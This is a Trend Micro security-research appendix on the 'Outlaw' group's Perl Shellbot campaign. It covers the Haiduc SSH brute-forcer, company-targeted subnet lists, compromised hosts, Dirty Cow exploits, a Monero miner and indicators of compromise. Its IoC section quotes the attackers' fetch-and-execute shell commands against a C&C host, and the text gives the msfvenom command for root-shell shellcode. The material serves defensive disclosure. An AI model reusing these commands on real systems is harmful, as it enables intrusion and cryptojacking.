Perl-Based Shellbot Looks toTarget Organizations via C&CAppendixTrendLabs Security Intelligence BlogTrend Micro Cyber Safety SolutionsTeamNovember2018 ----- Below is an overview of the most significant findings of the files from the compromised FTP related to the operation.80 million IP addresses generated with the set of parameters The compromised FTP contained various files and tools the attackers used. The first files found were configuration files for some toolsets. From part of one script, we recovered code that we used to obtain a list of 80 million IP addresses. Further research suggested it was the way to generate a randomized target list, which would make uncovering the real target within the decoy systems more difficult. _".d.php" returned all the parameters. Submitting each parameter to the URL_ _/128[.]199[.]255[.]180/src/[.]xpf/ips/$param returns a list of IP addresses for each particular_ parameter. _Figure 1. Parameter returns an IP address_ All the IP addresses were saved on the lists, called by the invoking parameter with the following script: ----- _Figure 2. Script saving all the listed IP addresses into a text file_ _Figure 3. All the downloaded files_ The supposed studio or the site itself has no business relevance, with no domain name linked to its business. It is likely that the whole website is just a covert page used to confuse the researchers and to disguise their operations. The configuration file for the IRC bouncer found on the compromised FTP This was the only seemingly working version of the toolset in development. It had various parts of open-source codes from other operations, and its initial purpose was to build an IRC-operated XMR miner with the ability to mask itself as another process. The Linux hacking tool “Shark” was found within these files. _Figure 4 and 5. Comments in the Romanian language re: the IRC bouncer_ Hacking tools found We also found open-source hacking tools with custom wrap-up bash scripts with comments written in the Romanian language. Among the files, there was a new toolkit ----- called Haiduc (detected by Trend Micro as Hacktool.Linux.SSHBRUTE.A), which translates to "An Outlaw," that was not seen before. It is, however, found for download on the website, arhivecodex[.]tk, which also hosts speed.py, the script for a performance check related to a Monero mining rig. _Figure 6. Screenshot of the website's front page_ The hacking tool was tested to scan the C&C servers while monitoring the traffic. It simply brute forced the SSH for credentials using the given wordlist, which was also captured from the hackers (the group which we named “Outlaw”). We tested whether this is some trap for script kiddies, but Haiduc did only what it was supposed to do — brute force the SSH credentials with the list of targets and wordlist. According to the content of the "Classes" directory (discussed later in this document), the tool is ready to be used for cyberattacks against listed companies, either to perform DDoS attacks or brute force the SSH service credentials on the target’s server, with a randomized order of the scanned IP addresses to make the detection more difficult. Details of Haiduc toolkit files We discussed the Haiduc kit toolset in the blog, including the ways hackers used it. Here, we discuss its toolset with the bash wrappers, including so-called "Class files". Each class ----- file stands for a certain company and contains the first two octets of a subnet. Other scripts from the toolkit generate the remaining two octets of the IP address for scanning. Running _Haiduc also revealed a list of compromised devices, with more than 185,000 distinct IP_ addresses. _Figure 7. A class file listing different companies, where “a” is a shell script wrapper for_ Haiduc ----- _Figure 8. Accepts parameters such as the number of threads to run (threads), password list_ _(passfile), and port number port)_ _Figure 9. File “all”, which is a list of values "./x 1; " from 1-225_ _Figure 10. File “all”, which is a list of values "./x 1; " from 1-225_ The file, gasite.txt, contains the loot and is the final output of the Haiduc tool, where the brute forcing resulted in 65,288 possibly compromised hosts. ----- _Figure 11. The file Hu keeps names of certain countries/classes_ _Figure 12. The file Ovh generates a wordlist of 234 certain usernames._ _Figure 13. The Pass wordlist generates another wordlist of 790 lines._ The file, _R, is a randomness generator for the scanner wrapper file, a, which makes the_ scanning more difficult to identify. ----- _Figure 14. R file_ _Figure 15. The Range file verifies the scanning range._ _Figure 16. The file, x, is a bash wrapper shell for the wrapper script “h”_ ----- _Figure 17. Classes_ These "classes" are the first two octets from subnetworks (subnet) of the abovementioned companies. As shown in the examples below. _Figure 18. 21vianet_ ----- _Figure 19. Facebook_ _Figure 20. Classes sorted by the size/number of eventual subnets_ ----- _Figure 21. Classes sorted by number of lines = number of subnets to be attacked by the_ _hackers = perimeter size_ The list of the hosts, compromised with Haiduc Among the files found on the compromised FTP server, there is also a list of the hosts compromised using the Haiduc tool. It is a 65 thousand-long list of IP addresses, usernames, and passwords for SSH access. The list of targets include smart devices, servers, and network components, among others. The following are only some of the compromised hosts: - Firewall of a hotel in South Korea: We detected two backdoors in their root file system. We notified the Korean CERT and have yet to receive a response at the time of writing. ----- _Figure 22. History of the commands that the hackers ran on the target system_ - Cowrie-based honeypot devices, marked as OS Linux svr04 3.2.0-4-amd64 and Linux Ubuntu 3.2.0-4-amd64 - A smart car charging system running on Linux Ubuntu 3.2.0-4-amd64 _Figure 23. Compromised host related to a smart car charging system_ - A VPN gateway, with a password that was already changed - A network switch ----- _Figure 24. Compromised host related to a network switch_ - Database server misused to mine Monero via the coinminer file xmrig-2.5.3-xenial_amd64.tar (detected by Trend Micro as Coinminer_MALXMR.SMGH2-ELF64)._ _Figure 25. The configuration of the miner used_ ----- _Figure 26. The corresponding wallet address was found with 1.161 XMR at the time of_ _writing_ Exploits found related to Ubuntu The Ubuntu privilege exploit was found in the file, Non, which is another privilege escalation [tool related to the exploit for CVE-2017-16995.](https://www.exploit-db.com/exploits/44298/) _Figure 27. Suspicious strings found in the file, non_ The threat actors used a variant of a hacking tool called "Faker" to spoof the properties of the process running after the initial exploitation to mask the malware-related process. Specifically, this was used to hide the IRC C&C communications from security monitoring during the initial exploitation. It was also used to disguise the Monero miner. _Figure 28. The file, h.c, is also the hacking tool Faker_ ----- The next exploits found on the system were based on Pokemon and Dirty Cow with a customized variant of shellcode (The Pokemon exploit is also based on the Dirty Cow vulnerability.). _Figure 29. Pokemon and Dirty Cow-related exploits_ [Dirty Cow](https://blog.trendmicro.com/trendlabs-security-intelligence/new-flavor-dirty-cow-attack-discovered-patched/) is a vulnerability that affects all Linux-based operating systems and even Android. It is a local privilege escalation bug that can be used with other exploits to allow remote execution to get root access on the host. The other exploit was the aforementioned _non file in this case._ Shellcode was generated with the command “msfvenom -p linux/x64/exec CMD=/bin/bash _PrependSetuid=True -f elf | xxd -I". In this case, it is a standard shellcode generated by the_ Metasploit suite msfvenom tool. This toolset is popular in the cybercriminal underground because it is open-source and readily available, and that it still works on most systems. _Figure 30. Dirty Cow exploit ready to use with custom shellcode_ CARP, the HA (high availability) cluster of C&Cs Common Address Redundancy Protocol (CARP) is a pfsense tool that can be used to build a firewall failover or IPSec base channel between two hosts. According to the file ----- _config.log, it seems to be used to create HA cluster from both of the hacked hosts_ _mail[.]rajukdhaka[.]gov[.]bd (202.79.16.178) and hxxp://www[.]nichido-_ _museum[.]or[.]jp/english/ (ftp://museum@museum04@153[.]122[.]156[.]232/Mail/n3)._ _Figure 31. CARP and config.log from hacked host_ Indicators of Compromise (IoCs) **Indicator** **Attribution/Description** |Indicator|Attribution/Description| |---|---| |153.122.156.232|FTP server| |202.79.16.178|Server| |54.37.72.170|C&C server Luci[.]madweb[.]ro| |42.63.154.190|New IP found in C&C communication from Host #1| |149.56.134.241|New IP found in C&C communication from Host #1| |49.51.172.224|New IP found in C&C communication from Host #1| |195.154.43.102|https://www[.]shodan[.]io/host/19 5[.]154[.]43[.]102| |Wireshark filter for any traffic related to any at least suspected C&C|| |ip.addr==153.122.156.232|Network traffic for suspected C&C IP add| |ip.addr==202.79.16.178|Network traffic for suspected C&C IP add| |ip.addr==54.37.72.170|Network traffic for suspected C&C IP add| ----- |ip.addr==42.63.154.190|Network traffic for suspected C&C IP add| |---|---| |ip.addr==149.56.134.241|Network traffic for suspected C&C IP add| |ip.addr==49.51.172.224|Network traffic for suspected C&C IP add| |IP addresses spreading the infection as of writing|| |61.8.73.166|| |195.154.43.102|| |107.1.153.75|| |218.25.74.221|| |69.64.62.159|| |54.37.72.170|| |128.199.255.180|Hosted PHP script that generated the 80M list of IP’s| |123.207.28.85|C&C that leads to epla backdoor| |132.232.43.102|| |42.63.154.190|Infected host #1 asked C&C about this IP| |hxxp://arhivecodex[.]tk/info|URL| |hxxp://sm0k3rnr1[.]000webhostapp[.]com/mata.pl|Similar infections, but points to a different IRC chat| |luci.madweb[.]ro|IRC bouncer hosting C&C server| |SHA256 for the files|Col2|Col3| |---|---|---| |d9cdf78bf6a71a8f8e00bbd2cfc6caefeae375dcc2a466 de51317ad2e5be6400|brute|ELF_MADVISE.DKG| |81d19b8d6a76f8501bbe2f3235821155597c56019eac 45da12a5cc3c860fbff8|n3|PERL_SHELLBOT.S M| |6318b936ce6493f2c3c6c13535e5647c1c834ad4e571 df9ed69a8e77169e01c7|nux2.6|ELF_SONEX.SMA| |3e527f293b775d46f377a12b6a31415f38540a5643127 18c656cbd1735200770|pscan|ELF_MADVISE.DKG| |Dirty Cow files||| ----- |16d84dd4c80d54cbe17c4bac328f1bb496da79fbcb90 5ebcab01b0eb1f975d41|c0w|Trojan.Linux.MADVI SE.AA| |---|---|---| |aca6bd0565422b69198343881b642a50371ddba8a5c 95dee8b32f38e1d882c56|cowroot|Trojan.Linux.MADVI SE.AA| |a75a4e09637cae521c4e169f1ecb622d5d116b121ff8c 8f3da094393a46692a8|d|ELF64_MADVISE.B| |d1f83570650c3f09f6bd5e807f3480b28af6c09d82dd52 3c8b1664d26cc04300|dirtyc0w|ELF64_MADVISE.B| |809fa09a304eebd30f81cdb91d7facdb90ed609df11ef5 b545e1a671348fc9f6|dirtycow-mem|ELF64_MADVISE.B| |2f5147a3d540fd55cd52183a22829b1789861cef4b194 c545421db5dca764045|dirty_passwd_adjust_cow|ELF64_MADVISE.B| |Haiduc toolset files||| |cfa35cc144a91db98660140913c1b9fbf4bdc00ac8f90 3a9ff76b3a3095a889f|epla|ELF_SONEX.SMA| |6163a3ca3be7c3b6e8449722f316be66079207e49383 0c1cf4e114128f4fb6a4|haiduc|Hacktool.Linux.SSH BRUTE.A| |bd65f76cd0a45d5bf71e8c77fd1be36d3c7cbcd41c737 59c4b825914ff87b9ac|xmrig-2.5.3-xenial-amd64.tar.gz|Coinminer_MALXMR .SMGH2-ELF64| **SSH usernames:** luci lucian dragos mazy hydra Poseidon Codex C0dex **Commands used:** Source Command 107.1.153.75 _uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl_ _n3; rm -rf n3; rm -rf n3.*_ 195.154.43.102 _uname -a; wget ftp://museum:museum04@153[.]122[.]156[.]232/Mail/n3; rm -rf n3;_ _rm -rf n3.*_ 218.25.74.221 _uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl_ _n3; rm -rf n3; rm -rf n3.*_ 61.8.73.166 _uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl_ _n3; rm -rf n3; rm -rf n3.*_ 61.8.73.166 _uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl_ _n3; rm -rf n3; rm -rf n3.*;wget hxxp://54[.]37[.]72[.]170/n.tgz;tar -xzvf n.tgz;rm -rf_ _n.tgz;cd .s;./run;cd /tmp_ 69.64.62.159 _uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*_ ----- Trend Micro Incorporated, a global leader in cybersecurity solutions, helps to make the world safe for exchanging digital information. Our innovative solutions for consumers, businesses, and governments provide layered security for data centers, cloud environments, networks, and endpoints. All our products work together to seamlessly share threat intelligence and provide a connected threat defense with centralized visibility and investigation, enabling better, faster protection. With almost 6,000 employees in over 50 countries and the world’s most advanced global threat intelligence, Trend Micro enables organizations to secure their connected world. For more information, visit www.trendmicro.com. ©2018 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners. -----